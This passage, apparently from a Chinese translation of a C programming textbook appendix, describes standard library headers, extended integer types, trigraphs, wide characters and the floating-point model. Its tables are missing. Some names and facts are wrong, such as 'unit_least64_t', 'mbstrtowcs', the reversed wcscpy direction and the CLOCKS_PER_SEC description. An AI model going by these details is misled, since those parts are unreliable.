float.h宏 1 FLT_RADIX用于表示3种浮点数类型的基数。——译者注 续表 1559 B.5.7 整数类型的格式转换:inttypes.h 1560 该头文件定义了一些宏可用作转换说明来扩展整数类型。参考资料 VI“扩展的整数类型”将进一步讨论。该头文件还声明了这个类型: imaxdiv_t。这是一个结构类型,表示idivmax()函数的返回值。 该头文件中还包含 stdint.h,并声明了一些使用最大长度整数类型的函 数,这种整数类型在stdint.h中声明为intmax。表B.5.10列出了这些函数。 表B.5.10 使用最大长度整数的函数 B.5.8 可选拼写:iso646.h 该头文件提供了11个宏,扩展了指定的运算符,如表B.5.11所列。 表B.5.11 可 选 拼写 B.5.9 本地化:locale.h 1561 本地化是一组设置,用于控制一些特定的设置项,如表示小数点的符 号。本地值储存在struct lconv类型的结构中,定义在 locale.h 头文件中。可 以用一个字符串来指定本地化,该字符串指定了一组结构成员的特殊值。默 认的本地化由字符串"C"指定。表 B.5.12 列出了本地化函数,后面做了简要 说明。 表B.5.12 本地化函数 setlocale()函数的locale形参所需的值可能是默认值"C",也可能是"",表 示实现定义的本地环境。实现可以定义更多的本地化设置。category形参的 值可能由表B.5.13中所列的宏表示。 表B.5.13 category宏 表B.5.14列出了struct lconv结构所需的成员。 表B.5.14 struct lcconv所需的成员 1562 续表 1563 B.5.10 数学库:math.h C99为math.h头文件定义了两种类型:float_t和double_t。这两种类型分 别与float和double类型至少等宽,是计算float和double时效率最高的类型。 该头文件还定义了一些宏,如表B.5.15所列。该表中除了HUGE_VAL 外,都是C99新增的。在参考资料VIII:“C99数值计算增强”中会进一步详细 介绍。 表B.5.15 math.h宏 续表 1564 数学函数通常使用double类型的值。C99新增了这些函数的float和long double版本,其函数名为分别在原函数名后添加f后缀和l后缀。例如,C语言 现在提供这些函数原型: double sin(double); float sinf(float); long double sinl(long double); 篇幅有限,表B.5.16仅列出了数学库中这些函数的double版本。该表引 用了FLT_RADIX,该常量定义在float.h中,代表内部浮点表示法中幂的底 数。最常用的值是2。 表B.5.16 ANSI C标准数学函数 续表 1565 续表 1566 1 NaN 分为两类:quite NaN 和 singaling NaN。两者的区别是:quite NaN 的尾数部分最高位定义为 1,而singaling NaN最高位定义为0。——译者注 续表 1567 B.5.11 非本地跳转:setjmp.h setjmp.h 头文件可以让你不遵循通常的函数调用、函数返回顺序。 setjmp()函数把当前执行环境的信息(例如,指向当前指令的指针)储存在 jmp_buf类型(定义在setjmp.h头文件中的数组类型)的变量中,然后 longjmp()函数把执行转至这个环境中。这些函数主要是用来处理错误条件, 并不是通常程序流控制的一部分。表B.5.17列出了这些函数。 表B.5.17 setjmp.h中的函数 B.5.12 信号处理:signal.h 信号(signal)是在程序执行期间可以报告的一种情况,可以用正整数 表示。raise()函数发送(或抛出)一个信号,signal()函数设置特定信号的响 应。 标准定义了一个整数类型:sig_atomic_t,专门用于在处理信号时指定 原子对象。也就是说,更新原子类型是不可分割的过程。 标准提供的宏列于表B.5.18中,它们表示可能的信号,可用作raise()和 signal()的参数。当然,实现也可以添加更多的值。 表B.5.18 信 号 宏 1568 signal()函数的第2个参数接受一个指向void函数的指针,该函数有一个 int类型的参数,也返回相同类型的指针。为响应一个信号而被调用的函数称 为信号处理器(signal handler)。标准定义了3个满足下面原型的宏: void (*funct)(int); 表B.5.19列出了这3种宏。 表B.5.19 void (*f)(int)宏 如果产生了信号sig,而且 func指向一个函数(参见表B.5.20中signal()原 型),那么大多数情况下先调用 signal(sig, SIG_DFL)把信号重置为默认设 置,然后调用(*func)(sig)。可以执行返回语句或调用abort()、exit()或 longjmp()来结束func指向的信号处理函数。 表B.5.20 信 号 函 数 B.5.13 对齐:stdalign.h(C11) stdalign.h头文件定义了4个宏,用于确定和指定数据对象的对齐属性。 1569 表B.5.21中列出了这些宏,其中前两个创建的别名与C++的用法兼容。 表B.5.21 void (*f)(int)宏 B.5.14 可变参数:stdarg.h stdarg.h 头文件提供一种方法定义参数数量可变的函数。这种函数的原 型有一个形参列表,列表中至少有一个形参后面跟有省略号: void f1(int n, ...);       /* 有效 */ int f2(int n, float x, int k, ...);/* 有效 */ double f3(...);         /* 无效 */ 在下面的表中,parmN是省略号前面的最后一个形参的标识符。在上面 的例子中,第1种情况的parmN为n,第2种情况的parmN为k。 头文件中声明了va_lis类型表示储存形参列表中省略号部分的形参数据 对象。表B.5.22中列出了3个带可变参数列表的函数中用到的宏。在使用这 些宏之前要声明一个va_list类型的对象。 表B.5.22 可变参数列表宏 1570 B.5.15 原子支持:stdatomic.h(C11) stdatomic.h和threads.h头文件支持并发编程。并发编程的内容超过了本 书讨论的范围,简单地说,stdatomic.h 头文件提供了创建原子操作的宏。编 程社区使用原子这个术语是为了强调不可分割的特性。一个操作(如,把一 个结构赋给另一个结构)从编程层面上看是原子操作,但是从机器语言层面 上看是由多个步骤组成。如果程序被分成多个线程,那么其中的线程可能读 或修改另一个线程正在使用的数据。例如,可以想象给一个结构的多个成员 赋值,不同线程给不同成员赋值。有了stdatomic.h头文件,就能创建这些可 以看作是不可分割的操作,这样就能保证线程之间互不干扰。 B.5.16 布尔支持:stdbool.h(C99) stdbool.h头文件定义了4个宏,如表B.5.23所列。 表B.5.23 stdbool.h宏 B.5.17 通用定义:stddef.h 该头文件定义了一些类型和宏,如表B.5.24和表B.5.25所列。 表B.5.24 stddef.h类型 表B.5.25 stddef.h宏 1571 示例 #include <stddef.h> struct car { char brand[30]; char model[30]; double hp; double price; }; int main(void) { size_t into = offsetof(struct car, hp); /* hp成员的偏移量 */ ... B.5.18 整数类型:stdint.h stdint.h头文件中使用typedef工具创建整数类型名,指定整数的属性。 stdint.h头文件包含在inttypes.h中,后者提供输入/输出函数调用的宏。参考资 料VI的“扩展的整数类型”中介绍了这些类型的用法。 1572 1.精确宽度类型 stdint.h头文件中用一组typedef标识精确宽度的类型。表B.5.26列出了它 们的类型名和大小。然而,注意,并不是所有的系统都支持其中的所有类 型。 表B.5.26 确切宽度类型 2.最小宽度类型 最小宽度类型保证其类型的大小至少是某数量位。表B.5.27列出了最小 宽度类型,系统中一定会有这些类型。 表B.5.27 最小宽度类型 3.最快最小宽度类型 在特定系统中,使用某些整数类型比其他整数类型更快。为此,stdint.h 1573 也定义了最快最小宽度类型,如表B.5.28所列,系统中一定会有这些类型。 表B.5.28 最快最小宽度类型 4.最大宽度类型 stdint.h 头文件还定义了最大宽度类型。这种类型的变量可以储存系统 中的任意整数值,还要考虑符号。表B.5.29列出了这些类型。 表B.5.29 最大宽度类型 5.可储存指针值的整数类型 stdint.h头文件中还包括表B.5.30中所列的两种整数类型,它们可以精确 地储存指针值。也就是说,如果把一个void *类型的值赋给这种类型的变 量,然后再把该类型的值赋回给指针,不会丢失任何信息。系统可能不支持 这类型。 表B.5.30 可储存指针值的整数类型 6.已定义的常量 1574 stdint.h头文件定义了一些常量,用于表示该头文件中所定义类型的限定 值。常量都根据类型命名,即用_MIN或_MAX代替类型名中的_t,然后把所 有字母大写即得到表示该类型最小值或最大值的常量名。例如,int32_t类型 的最小值是INT32_MIN、unit_fast16_t的最大值是UNIT_FAST16_MAX。表 B.5.31总结了这些常量以及与之相关的intptr_t、unitptr_t、intmax_t和uintmax_t 类型,其中的N表示位数。这些常量的值应等于或大于(除非指明了一定要 等于)所列的值。 表B.5.31 整 型 常 量 该头文件还定义了一些别处定义的类型使用的常量,如表B.5.32所示。 表B.5.32 其他整型常量 1575 7.扩展的整型常量 stdin.h头文件定义了一些宏用于指定各种扩展整数类型。从本质上看, 这种宏是底层类型(即在特定实现中表示扩展类型的基本类型)的强制转 换。 把类型名后面的_t 替换成_C,然后大写所有的字母就构成了一个宏 名。例如,使用表达式UNIT_LEAST64_C(1000)后,1000就是unit_least64_t 类型的常量。 B.5.19 标准I/O库:stdio.h ANSI C标准库包含一些与流相关联的标准I/O函数和stdio.h头文件。表 B.5.33列出了ANSI中这些函数的原型和简介(第13章详细介绍过其中的一些 函数)。stdio.h头文件定义了FILE类型、EOF和NULL的值、标准I/O流 (stdin、stdout和stderr)以及标准I/O库函数要用到的一些常量。 表B.5.33 C标准I/O函数 1576 续表 1577 B.5.20 通用工具:stdlib.h ANSI C标准库在stdlib.h头文件中定义了一些实用函数。该头文件定义 了一些类型,如表B.5.34所示。 表B.5.34 stdlib.h中声明的类型 1578 stdlib.h头文件定义的常量列于表B.5.35中。 表B.5.35 stdlib.h中定义的常量 表B.5.36列出了stdlib.h中的函数原型。 表B.5.36 通 用 工 具 1579 续表 1580 续表 1581 续表 1582 B.5.21 _Noreturn:stdnoreturn.h stdnoreturn.h定义了noreturn宏,该宏展开为_Noreturn。 B.5.22 处理字符串:string.h string.h库定义了size_t类型和空指针要使用的NULL宏。string.h头文件提 供了一些分析和操控字符串的函数,其中一些函数以更通用的方式处理内 存。表B.5.37列出了这些函数。 表B.5.37 字符串函数 1583 续表 1584 strtok()函数的用法有点不寻常,下面演示一个简短的示例。 1585 #include <stdio.h> #include <string.h> int main(void) { char data[] = " C is\t too#much\nfun!"; const char tokseps[] = " \t\n#";/* 分隔符 */ char * pt; puts(data); pt = strtok(data,tokseps);   /* 首次调用 */ while (pt)            /* 如果pt是NULL,则退出 */ { puts (pt);          /* 显示记号 */ pt = strtok(NULL, tokseps);/* 下一个记号 */ } return 0; } 下面是该示例的输出: C is too#much fun! 1586 C is too much fun! B.5.23 通用类型数学:tgmath.h(C99) math.h和complex.h库中有许多类型不同但功能相似的函数。例如,下面6 个都是计算正弦的函数: double sin(double); float sinf(float); long double sinl(long double); double complex csin(double complex); float csinf(float complex); long double csinl(long double complex); tgmath.h 头文件定义了展开为通用调用的宏,即根据指定的参数类型调 用合适的函数。下面的代码演示了使用sin()宏时,展开为正弦函数的不同形 式: #include <tgmath.h> ... double dx, dy; 1587 float fx, fy; long double complex clx, cly; dy = sin(dx);          // 展开为dy = sin(dx) (函数) fy = sin(fx);          // 展开为fy = sinf(fx) cly = sin(clx);         // 展开为cly = csinl(clyx) tgmath.h头文件为3类函数定义了通用宏。第1类由math.h和complex.h中定 义的6个函数的变式组成,用l和f后缀和c前缀,如前面的sin()函数所示。在 这种情况下,通用宏名与该函数double类型版本的函数名相同。 第2类由math.h头文件中定义的3个函数变式组成,使用l和f后缀,没有 对应的复数函数(如,erf())。在这种情况下,宏名与没有后缀的函数名相 同,如erf()。使用带复数参数的这种宏的效果是未定义的。 第3类由complex.h头文件中定义的3个函数变式组成,使用l和f后缀,没 有对应的实数函数,如cimag()。使用带实数参数的这种宏的效果是未定义 的。 表B.5.38列出了一些通用宏函数。 表B.5.38 通用数学函数 在C11以前,编写实现必须依赖扩展标准才能实现通用宏。但是使用 1588 C11新增的_Generic表达式可以直接实现。 B.5.24 线程:threads.h(C11) threads.h和stdatomic.h头文件支持并发编程。这方面的内容超出了本书 讨论的范围,简而言之,该头文件支持程序执行多线程,原则上可以把多个 线程分配给多个处理器处理。 B.5.25 日期和时间:time.h time.h定义了3个宏。第1个宏是表示空指针的NULL,许多其他头文件中 也定义了这个宏。第2个宏是CLOCKS_PER_SEC,该宏除以clock()的返回值 得以秒为单位的时间值。第3个宏(C11)是TIME_UTC,这是一个正整型常 量,用于指定协调世界时 [1](即UTC)。该宏是timespec_get()函数的一个 可选参数。 UTC是目前主要世界时间标准,作为互联网和万维网的普通标准,广泛 应用于航空、天气预报、同步计算机时钟等各领域。 time.h头文件中定义的类型列在表B.5.39中。 表B.5.39 time.h中定义的类型 timespec结构中至少有两个成员,如表B.5.40所列。 表B.5.40 timespec结构中的成员 1589 日历类型的各组成部分被称为分解时间(broken-down time)。表B.5.41 列出了struct tm结构中所需的成员。 表B.5.41 struct tm结构中的成员 日历时间(calendar time)表示当前的日期和时间,例如,可以是从 1900年的第1秒开始经过的秒数。本地时间(local time)指的是本地时区的 日历时间。表B.5.42列出了一些时间函数。 表B.5.42 时 间 函 数 续表 1590 表B.5.43列出了strftime()函数中使用的转换说明。其中许多替换的值 (如,月份名)都取决于当前的本地化设置。 表B.5.43 strftime()函数中使用的转换说明 1591 续表 1592 B.5.26 统一码工具:uchar.h(C11) C99 的 wchar.h 头文件提供两种途径支持大型字符集。C11 专门针对统 一码(Unicode)新增了适用于UTF-16和UTF-32编码的类型(见表 B.5.44)。 表B.5.44 uchar.h中声明的类型 该头文件中还声明了一些多字节字符串与char16_t、char32_t格式相互转 换的函数(见表B.5.45)。 表B.5.45 宽字符与多字节转换函数 1593 续表 B.5.27 扩展的多字节字符和宽字符工具:wchar.h(C99) 每种实现都有一个基本字符集,要求C的char类型足够宽,以便能处理 这个字符集。实现还要支持扩展的字符集,这些字符集中的字符可能需要多 字节来表示。可以把多字节字符与单字节字符一起储存在普通的 char 类型 数组,用特定的字节值指定多字节字符本身及其大小。如何解释多字节字符 取决于移位状态(shift state)。在最初的移位状态中,单字节字符保留其通 常的解释。特殊的多字节字符可以改变移位状态。除非显式改变特定的移位 状态,否则移位状态一直保持有效。 wchar_t类型提供另一种表示扩展字符的方法,该类型足够宽,可以表 示扩展字符集中任何成员的编码。用这种宽字符类型来表示字符时,可以把 单字符储存在wchar_t类型的变量中,把宽字符的字符串储存在wchar_t类型 的数组中。字符的宽字符表示和多字节字符表示不必相同,因为后者可能使 用前者并不使用的移位状态。 wchar.h 头文件提供了一些工具用于处理扩展字符的两种表示法。该头 文件中定义的类型列在表B.5.46中(其中有些类型也定义在其他的头文件 中)。 表B.5.46 wchar.h中定义的类型 1594 wchar.h头文件中还定义了一些宏,如表B.5.47所列。 表B.5.47 wchar.h中定义的宏 该库提供的输入/输出函数类似于stdio.h中的标准输入/输出函数。在标 准I/O函数返回EOF的情况中,对应的宽字符函数返回WEOF。表B.5.48中列 出了这些函数。 表B.5.48 宽字符I/O函数 1595 有一个宽字符I/O函数没有对应的标准I/O函数: int fwide(FILE *stream, int mode)[2]; 如果mode为正,函数先尝试把形参表示的流指定为宽字符定向(wide- charaacter oriented);如果 mode为负,函数先尝试把流指定为字节定向 (byte oriented);如果 mode为0,函数则不改变流的定向。该函数只有在 流最初无定向时才改变其定向。在以上所有的情况中,如果流是宽字符定 向,函数返回正值;如果流是字节定向,函数返回负值;如果流没有定向, 函数则返回0。 wchar.h 头文件参照 string.h,也提供了一些转换和控制字符串的函数。 一般而言,用 wcs 代替sting.h中的str标识符,这样wcstod()就是strtod()函数 的宽字符版本。表B.5.49列出了这些函数。 1596 表B.5.49 宽字符字符串工具 续表 该头文件还参照time.h头文件中的strtime()函数,声明了一个时间函数: size_t wcsftime(wchar_t * restrict s, size_t maxsize,const wchar_t * restrict format, 1597 const struct tm * restrict timeptr); 除此之外,该头文件还声明了一些用于宽字符字符串和多字节字符相互 转换的函数,如表B.5.50所列。 表B.5.50 宽字节和多字节字符转换函数 续表 1598 B.5.28 宽字符分类和映射工具:wctype.h(C99) wctype.h 库提供了一些与 ctype.h 中的字符函数类似的宽字符函数,以 及其他函数。wctype.h还定义了表B.5.51中列出的3种类型和宏。 表B.5.51 wctpe.h中定义的类型和宏 1599 在该库中,如果宽字符参数满足字符分类函数的条件时,函数返回真 (非0)。一般而言,因为单字节字符对应宽字符,所以如果 ctype.h 中对应 的函数返回真,宽字符函数也返回真。表 B.5.52 列出了这些函数。 表B.5.52 宽字节分类函数 该库还包含两个可扩展的分类函数,因为它们使用当前本地化的 LC_CTYPE值进行分类。表B.5.53列出了这些函数。 表B.5.53 可扩展的宽字符分类函数 1600 wctype()函数的有效参数名即是宽字符分类函数名去掉 isw 前缀。例 如,wctype("alpha")表示的是 iswalpha()函数判断的字符类别。因此,调用 iswctype(wc, wctype("alpha"))相当于调用iswalpha(wc),唯一的区别是前者使 用LC_CTYPE类别进行分类。 该库还有4个与转换相关的函数。其中有两个函数分别与ctype.h库中 toupper()和tolower()相对应。第3个函数是一个可扩展的版本,通过本地化的 LC_CTYPE设置确定字符是大写还是小写。第4个函数为第3个函数提供合适 的分类参数。表B.5.54列出了这些函数。 表B.5.54 宽字符转换函数 1601 B.6 参考资料VI:扩展的整数类型 第3章介绍过,C99的inttypes.h头文件为不同的整数类型提供一套系统的 别名。这些名称与标准名称相比,能更清楚地描述类型的性质。例如,int类 型可能是16位、32位或64位,但是int32_t类型一定是32位。 更精确地说,inttypes.h头文件定义的一些宏可用于scanf()和printf()函数 中读写这些类型的整数。inttypes.h头文件包含的stdlib.h头文件提供实际的类 型定义。格式化宏可以与其他字符串拼接起来形成合适格式化的字符串。 该头文件中的类型都使用typedef定义。例如,32位系统的int可能使用这 样的定义: typedef int int32_t; 用#define指令定义转换说明。例如,使用之前定义的int32_t的系统可以 这样定义: #define PRId32 "d" // 输出说明符 #define SCNd32 "d" // 输入说明符 使用这些定义,可以声明扩展的整型变量、输入一个值和显示该值: int32_t cd_sales; // 32位整数类型 scanf("%" SCNd32, &cd_sales); printf("CD sales = %10" PRId32 " units\n", cd_sales); 如果需要,可以把字符串拼接起得到最终的格式字符串。因此,上面的 代码可以这样写: int cd_sales; // 32位整数类型 1602 scanf("%d", &cd_sales); printf("CD sales = %10d units\n", cd_sales); 如果把原始代码移植到16位int的系统中,该系统可能把int32_t定义为 long,把PRId32定义为"ld"。但是,仍可以使用相同的代码,只要知道系统 使用的是32位整型即可。 该参考资料的其余部分列出了扩展类型、转换说明以及表示类型限制的 宏。 B.6.1 精确宽度类型 typedef标识了一组精确宽度的类型,通用形式是intN_t(有符号类型) 和uintN_t(无符号类型),其中N表示位数(即类型的宽度)。但是要注 意,不是所有的系统都支持所有的这些类型。例如,最小可用内存大小是16 位的系统就不支持int8_t和uint8_t类型。格式宏可以使用d或i表示有符号类 型,所以PRIi8和SCNi8都有效。对于无符号类型,可以使用o、x或u以获 得%o、%x或%X转换说明来代替%u。例如,可以使用PRIX32以十六进制格 式打印uint32_t类型的值。表B.6.1列出了精确宽度类型、格式说明符和最小 值、最大值。 表B.6.1 精确宽度类型 B.6.2 最小宽度类型 1603 最小宽度类型保证一种类型的大小至少是某位。这些类型一定存在。例 如,不支持 8 位单元的系统可以把int_least_8定义为16位类型。表B.6.2列出 了最小宽度类型、格式说明符和最小值、最大值。 表B.6.2 最小宽度类型 B.6.3 最快最小宽度类型 对于特定的系统,用特定的整型更快。例如,在某些实现中 int_least16_t可能是short,但是系统在进行算术运算时用int类型会更快些。 因此,inttypes.h还定义了表示为某位数的最快类型。这些类型一定存在。在 某些情况下,可能并未明确指定哪种类型最快,此时系统会简单地选择其中 的一种。表B.6.3列出了最快最小宽度类型、格式说明符和最小值、最大 值。 表B.6.3 最快最小宽度类型 B.6.4 最大宽度类型 1604 有些情况下要使用最大整数类型,表B.6.4列出了这些类型。实际上, 由于系统可能会提供比所需类型更大宽度的类型,因此这些类型的宽度可能 比long long或unsigned long long更大。 表B.6.4 最大宽度类型 B.6.5 可储存指针值的整型 inttypes.h头文件(通过包含stdint.h即可包含该头文件)定义了两种整数 类型,可精确地储存指针值,见表B.6.5。 表B.6.5 可储存指针值的整数类型 B.6.6 扩展的整型常量 在整数后面加上L后缀可表示long类型的常量,如445566L。如何表示 int32_t类型的常量?要使用inttypes.h头文件中定义的宏。例如,表达式 INT32_C(445566)展开为一个int32_t类型的常量。从本质上看,这种宏相当 于把当前类型强制转换成底层类型,即特殊实现中表示int32_t类型的基本类 型。 宏名是把相应类型名中的_C 用_t 替换,再把名称中所有的字母大写。 例如,要把 1000 设置为unit_least64_t类型的常量,可以使用表达式 UNIT_LEAST64_C(1000)。 1605 B.7 参考资料VII:扩展字符支持 C 语言最初并不是作为国际编程语言设计的,其字符的选择或多或少是 基于标准的美国键盘。但是,随着后来C在世界范围内越来越流行,不得不 扩展来支持不同且更大的字符集。这部分参考资料概括介绍了一些相关内 容。 B.7.1 三字符序列 有些键盘没有C中使用的所有符号,因此C提供了一些由三个字符组成 的序列(即三字符序列)作为这些符号的替换表示。如表B.7.1所示。 表B.7.1 三字符序列 C替换了源代码文件中的这些三字符序列,即使它们在双引号中也是如 此。因此,下面的代码: ??=include <stdio.h> ??=define LIM 100 int main() ??< int q??(LIM??); printf("More to come.??/n"); ... 1606 ??> 会变成这样: #include <stdio.h> #define LIM 100 int main() { int q[LIM]; printf("More to come.\n"); ... } 当然,要在编译器中设置相关选项才能激活这个特性。 B.7.2 双字符 意识到三字符系统很笨拙,C99提供了双字符(digraph),可以使用它 们来替换某些标准C标点符号。 表B.7.2 双字符 与三字符不同的是,不会替换双引号中的双字符。因此,下面的代码: %:include <stdio.h> %:define LIM 100 1607 int main() <% int q<:LIM:>; printf("More to come.:>"); ... %> 会变成这样: #include <stdio.h> #define LIM 100 int main() { int q[LIM]; printf("More to come.:>"); // :>是字符串的一部分 ... }                // :>与 }相同 B.7.3 可选拼写:iso646.h 使用三字符序列可以把||运算符写成??!??!,这看上去比较混乱。C99 通 过iso646.h头文件(参考资料V中的表B.5.11)提供了可展开为运算符的宏。 C标准把这些宏称为可选拼写(alternative spelling)。 如果包含了iso646.h头文件,以下代码: 1608 if(x == M1 or x == M2) x and_eq 0XFF; 可展开为下面的代码: if(x == M1 || x == M2) x &= 0XFF; B.7.4 多字节字符 C 标准把多字节字符描述为一个或多个字节的序列,表示源环境或执行 环境中的扩展字符集成员。源环境指的是编写源代码的环境,执行环境指的 是用户运行已编译程序的环境。这两个环境不同。例如,可以在一个环境中 开发程序,在另一个环境中运行该程序。扩展字符集是C语言所需的基本字 符集的超集。 有些实现会提供扩展字符集,方便用户通过键盘输入与基本字符集不对 应的字符。这些字符可用于字符串字面量和字符常量中,也可出现在文件 中。有些实现会提供与基本字符集等效的多字节字符,可替换三字符和双字 符。 例如,德国的一个实现也许会允许用户在字符串中使用日耳曼元音变音 字符: puts("eins zwei drei vier fünf"); 一般而言,程序可使用的扩展字符集因本地化设置而异。 B.7.5 通用字符名(UCN) 多字节字符可以用在字符串中,但是不能用在标识符中。C99新增了通 用字符名(UCN),允许用户在标识名中使用扩展字符集中的字符。系统扩 展了转义序列的概念,允许编码ISO/IEC 10646标准中的字符。该标准由国 1609 际标准化组织(ISO)和国际电工技术委员会(IEC)共同制定,为大量的 字符提供数值码。10646标准和统一码(Unicode)关系密切。 有两种形式的UCN序列。第1种形式是\u hexquard,其中hexquard是一个 4位的十六进制数序列(如,\u00F6)。第 2种形式是\U hexquardhexquard, 如\U0000AC01。因为十六进制每一位上的数对应4位,\u形式可用于16位整 数表示的编码,\U形式可用于32位整数表示的编码。 如果系统实现了UCN,而且包含了扩展字符集中所需的字符,就可以在 字符串、字符常量和标识符中使用UCN: wchar_t value\u00F6\u00F8 = L'\u00f6'; 统一码和ISO 10646 统一码为表示不同的字符集提供了一种解决方案,可以根据类型为大量 字符和符号制定标准的编号系统。例如,ASCII码被合并为统一码的子集, 因此美国拉丁字符(如A~Z)在这两个系统中的编码相同。但是,统一码 还合并了其他拉丁字符(如,欧洲语言中使用的一些字符)和其他语言中的 字符,包括希腊文、西里尔字母、希伯来文、切罗基文、阿拉伯文、泰文、 孟加拉文和形意文字(如中文和日文)。到目前为止,统一码表示的符号超 过了 110000个,而且仍在发展中。欲了解更多细节,请查阅统一码联合站 点:www.unicode.org。 统一码为每个字符分配一个数字,这个数字称为代码点(code point)。典型的统一码代码点类似:U-222B。U表示该字符是统一字符, 222B是表示该字符的一个十六进制数,在这种情况下,表示积分号。 国际标准化组织(ISO)组建了一个团队开发ISO 10646和标准编码的多 语言文本。ISO 10646团队和统一码团队从1991年开始合作,一直保持两个 标准的相互协调。 B.7.6 宽字符 1610 C99为使用宽字符提供更多支持,通过wchar.h和wctype.h库包含了更多 大型字符集。这两个头文件把wchar_t定义为一种整型类型,其确切的类型 依赖实现。该类型用于储存扩展字符集中的字符,扩展字符集是是基本字符 集的超集。根据定义,char类型足够处理基本字符集,而wchar_t类型则需要 更多位才能储存更大范围的编码值。例如,char 可能是 8 位字节,wchar_t 可能是 16 位的 unsigned short。 用L前缀标识宽字符常量和字符串字面量,用%lc和%ls显示宽字符数 据: wchar_t wch = L'I'; wchar_t w_arr[20] = L"am wide!"; printf("%lc %ls\n", wch, w_arr); 例如,如果把wchar_t实现为2字节单元,'I'的1字节编码应储存在wch的 低位字节。不是标准字符集中的字符可能需要两个字节储存字符编码。例 如,可以使用通用字符编码表示超出 char 类型范围的字符编码: wchar_t w = L'\u00E2'; /* 16位编码值 */ 内含 wchar_t 类型值的数组可用于储存宽字符串,每个元素储存一个宽 字符编码。编码值为 0 的wchar_t值是空字符的wchar_t类型等价字符。该字 符被称为空宽字符(null wide character),用于表示宽字符串的结尾。 可以使用%lc和%ls读取宽字符: wchar_t wch1; wchar_t w_arr[20]; puts("Enter your grade:"); scanf("%lc", &wch1); 1611 puts("Enter your first name:"); scanf("%ls",w_arr); wchar_t头文件为宽字符提供更多支持,特别是提供了宽字符I/O函数、 宽字符转换函数和宽字符串控制函数。例如,可以用fwprintf()和wprintf()函 数输出,用fwscanf()和wscanf()函数输入。与一般输入/输出函数的主要区别 是,这些函数需要宽字符格式字符串,处理的是宽字符输入/输出流。例 如,下面的代码把信息作为宽字符显示: wchar_t * pw = L"Points to a wide-character string"; int dozen = 12; wprintf(L"Item %d: %ls\n", dozen, pw); 类似地,还有getwchar()、putwchar()、fgetws()和fputws()函数。wchar_t 头文件定义了一个WEOF宏,与EOF在面向字节的I/O中起的作用相同。该宏 要求其值是一个与任何有效字符都不对应的值。因为wchar_t类型的值都有 可能是有效字符,所以wchar_t库定义了一个wint_t类型,包含了所有wchar_t 类型的值和WEOF的值。 该库中还有与string.h库等价的函数。例如,wcscpy(ws1, ws2)把ws1指 定的宽字符串拷贝到ws2指向的宽字符数组中。类似地,wcscmp()函数比较 宽字符串,等等。 wctype.h头文件新增了字符分类函数,例如,如果iswdigit()函数的宽字 符参数是数字,则返回真;如果iswblank()函数的参数是空白,则返回真。 空白的标准值是空格和水平制表符,分别写作L''和L'\t'。 C11标准通过uchar.h头文件为宽字符提供更多支持,为匹配两种常用的 统一码格式,定义了两个新类型。第1种类型是char16_t,可储存一个16位编 码,是可用的最小无符号整数类型,用于hexquard UCN形式和统一码UTF-16 编码方案。 1612 char16_t = '\u00F6'; 第2种类型是char32_t,可储存一个32位编码,最小的可用无符号整数类 型,。可用于hexquard UCN形式和统一码UTF-32编码方案 char32_t = '\U0000AC01'; 前缀u和U分别表示char16_t和char32_t字符串。 char16_t ws16[11] = u"Tannh\u00E4user"; char32_t ws32[13] = U"caf\U000000E9 au lait"; 注意,这两种类型比wchar_t类型更具体。例如,在一个系统中, wchar_t可以储存32位编码,但是在另一个系统中也许只能储存16位的编 码。另外,这两种新类型都与C++兼容。 B.7.7 宽字符和多字节字符 宽字符和多字节字符是处理扩展字符集的两种不同的方法。例如,多字 节字符可能是一个字节、两个字节、三个字节或更多字节,而所有的宽字符 都只有一个宽度。多字节字符可能使用移位状态(移位状态是一个字节,确 定如何解释后续字节);而宽字符没有移位状态。可以把多字节字符的文件 读入使用标准输入函数的普通char类型数组,把宽字节的文件读入使用宽字 符输入函数的宽字节数组。 C99 在wchar.h库中提供了一些函数,用于多字节和宽字节之间的转换。 mbrtowc()函数把多字节字符转换为宽字符,wcrtomb()函数把宽字符转换为 多字节字符。类似地,mbstrtowcs()函数把多字节字符串转换为宽字节字符 串,wcstrtombs()函数把宽字节字符串转换为多字节字符串。 C11在uchar.h库中提供了一些函数,用于多字节和char16_t之间的转换, 以及多字节和char32_t之间的转换。 1613 B.8 参考资料VIII:C99/C11数值计算增强 过去,FORTRAN是数值科学计算和工程计算的首选语言。C90使C的计 算方法更接近于FORTRAN。例如,float.h中使用的浮点特性规范都是基于 FORTRAN标准委员会开发的模型。C99和C11标准继续增强了C的计算能 力。例如,C99新增的变长数组(C11成为可选的特性),比传统的C数组更 符合FORTRAN的用法(如果实现不支持变长数组,C11指定了 __STDC_NO_VLA__宏的值为1)。 B.8.1 IEC浮点标准 国际电工技术委员会(IEC)已经发布了一套浮点计算的标准(IEC 60559)。该标 准包括了浮点数的格式、精度、NaN、无穷值、舍入规则、 转换、异常以及推荐的函数和算法等。C99纳入了该标准,将其作为C实现 浮点计算的指导标准。C99新增的大部分浮点工具(如,fenv.h头文件和一些 新的数学函数)都基于此。另外,float.h头文件定义了一些与IEC浮点模型 相关的宏。 1.浮点模型 下面简要介绍一下浮点模型。标准把浮点数x看作是一个基数的某次幂 乘以一个分数,而不是C语言的E记数法(例如,可以把876.54写成 0.87654E3)。正式的浮点表示更为复杂: 简单地说,这种表示法把一个数表示为有效数(significand)与b的e次 幂的乘积。 下面是各部分的含义。 s代表符号(±1)。 1614 b代表基数。最常见的值是2,因为浮点处理器通常使用二进制数学。 e代表整数指数(不要与自然对数中使用的数值常量e混淆),限制最小 值和最大值。这些值依赖于留出储存指数的位数。 fk代表基数为b时可能的数字。例如,基数为2时,可能的数字是0和1; 在十六进制中,可能的数字是0~F。 p代表精度,基数为b时,表示有效数的位数。其值受限于预留储存有效 数字的位数。 明白这种表示法的关键是理解float.h和fenv.h的内容。下面,举两个例子 解释内部如何表示浮点数。 首先,假设一个浮点数的基数b为10,精度p为5。那么,根据上面的表 示法,24.51应写成: (+1)103(2/10 + 4/100 + 5/1000 + 1/10000 + 0/100000) 假设计算机可储存十进制数(0~9),那么可以储存符号、指数3和5个 fk值:2、4、5、1、0(这里,f1是2,f2是4,等等)。因此,有效数是 0.24510,乘以103得24.51。 接下来,假设符号为正,基数b是2,p是7(即,用7位二进制数表 示),指数是5,待储存的有效数是1011001。下面,根据上面的公式构造该 数: x = (+1)25(1/2 +0/4 + 1/8 + 1/16 + 0/32 + 0/64 + 1/128) = 32(1/2 +0/4 + 1/8 + 1/16 + 0/32 + 0/64 + 1/128) = 16 + 0 + 4 + 2 +0 + 0 + 1/4 = 22.25 float.h中的许多宏都与该浮点表示相关。例如,对于一个float类型的 1615 值,表示基数的FLT_RADIX是b,表示有效数位数(基数为b时)的 